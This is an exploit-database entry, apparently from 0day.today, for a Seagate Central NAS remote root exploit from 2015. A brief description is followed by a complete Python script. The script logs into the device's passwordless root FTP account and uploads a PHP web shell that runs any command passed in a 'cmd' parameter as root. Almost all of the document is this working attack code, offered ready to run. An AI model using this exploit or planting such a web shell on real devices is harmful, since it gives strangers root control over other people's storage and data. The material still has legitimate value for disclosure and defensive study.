Seagate Central Remote Root Exploit

2015-06-04T00:00:00
ID 1337DAY-ID-23704
Type zdt
Reporter Jeremy Brown
Modified 2015-06-04T00:00:00

Description

Seagate Central by default has a passwordless root account (and no option to change it). This exploit logs into the ftp server and uploads a php shell to the webroot. From there, the uploaded shell can execute commands with root privileges as lighttpd.

                                        
                                            #!/usr/bin/python
# seagate_ftp_remote_root.py
#
# Seagate Central Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central by default has a passwordless root account (and no option to change it).
# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
# From there, we can execute commands with root privileges as lighttpd is also running as root.
#
# -Fixes-
#
# Seagate scheduled it's updates to go live on April 28th, 2015.
#
# Tested Firmware Version: 2014.0410.0026-F
#

import sys
from ftplib import FTP

port = 21

php_shell = """
<?php
if(isset($_REQUEST['cmd']))
{
    $cmd = ($_REQUEST["cmd"]);
    echo "<pre>$cmd</pre>";
    system($cmd);
}
?>
"""

php_shell_filename = "shell.php"
seagate_central_webroot = "/cirrus/"

def main():
    if(len(sys.argv) < 2):
        print("Usage: %s <host>" % sys.argv[0])
        return

    host = sys.argv[1]

    try:
        with open(php_shell_filename, 'w') as file:
            file.write(php_shell)

    except Exception as error:
        print("Error: %s" % error);
        return

    try:
        ftp = FTP(host)
        ftp.login("root")
        ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
        ftp.close()
    
    except Exception as error:
        print("Error: %s" % error);
        return

    print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))

    return

if __name__ == "__main__":
    main()

#  0day.today [2018-04-07]  #